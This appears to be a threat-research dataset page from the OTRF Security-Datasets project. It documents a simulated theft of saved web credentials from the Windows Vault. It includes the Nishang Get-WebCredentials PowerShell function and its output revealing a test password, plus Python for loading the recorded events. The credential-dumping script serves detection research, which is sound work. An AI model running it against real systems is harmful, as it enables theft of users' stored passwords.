Contents

Windows Vault Web Credentials

Contents

Windows Vault Web Credentials#

Metadata#


Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/10/28
Modification Date	2020/10/28
Tactics	TA0004,TA0005
Techniques	T1055
Tags	None

Dataset Description#

This dataset represents threat actors accessing the Windows Vault and reading web credentials saved.

Datasets Downloads#

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_windows_vault_web_credentials.zip

Simulation Metadata#

Tools#

type	Name	Module
Manual	PowerShell	PowerShell

Adversary View#

Add Web Credentials
-------------------
PS > $pv = New-Object Windows.Security.Credentials.PasswordVault
PS > $pw = New-Object Windows.Security.Credentials.PasswordCredential('http://ossemproject.com', 'pgustavo', 'Pass@Word')
PS >$pv.Add($pw)

Import Get-WebCredentials
-------------------------
function Get-WebCredentials
{
  <#
  .SYNOPSIS
  Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above)
  .DESCRIPTION
  This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script 
  also needs PowerShell v3 onwards and must be run from an elevated shell.
  .EXAMPLE
  PS > Get-WebCredentials
  .LINK
  https://github.com/samratashok/nishang
  #>
  [CmdletBinding()] Param ()
  
  
  #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage
  $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
  $VaultObj = new-object Windows.Security.Credentials.PasswordVault
  $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }
}

Run Get-WebCredentials
----------------------
PS C:\Users\wardog> Get-WebCredentials

UserName Resource                Password  Properties
-------- --------                --------  ----------
pgustavo http://ossemproject.com Pass@Word {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], ...


PS C:\Users\wardog>

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_windows_vault_web_credentials.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)

References#

https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1